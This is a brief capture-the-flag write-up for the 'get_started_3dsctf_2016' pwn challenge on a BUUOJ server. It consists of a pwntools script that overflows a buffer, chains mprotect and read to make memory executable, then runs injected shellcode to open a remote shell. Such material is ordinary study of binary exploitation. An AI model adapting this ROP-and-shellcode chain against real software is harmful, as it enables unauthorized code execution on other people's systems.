get_started_3dsctf_2016
mprotect函数用于改变内存权限
exp:
from pwn import * context.log_level = 'debug' #io = process("./get_started_3dsctf_2016") io = remote("node4.buuoj.cn",28786) elf = ELF("./get_started_3dsctf_2016") shellcode = asm(shellcraft.sh()) pop_ret = 0x0804f460 mprotect_addr = 0x0806EC80 addr = 0x080EB000 read_addr = 0x0806E140 payload = b'a'*56 + p32(mprotect_addr) + p32(pop_ret) + p32(addr) + p32(0x1000) + p32(7) payload += p32(read_addr) + p32(pop_ret) + p32(0) + p32(addr) + p32(0x100) payload += p32(addr) io.sendline(payload) io.sendline(shellcode) io.interactive()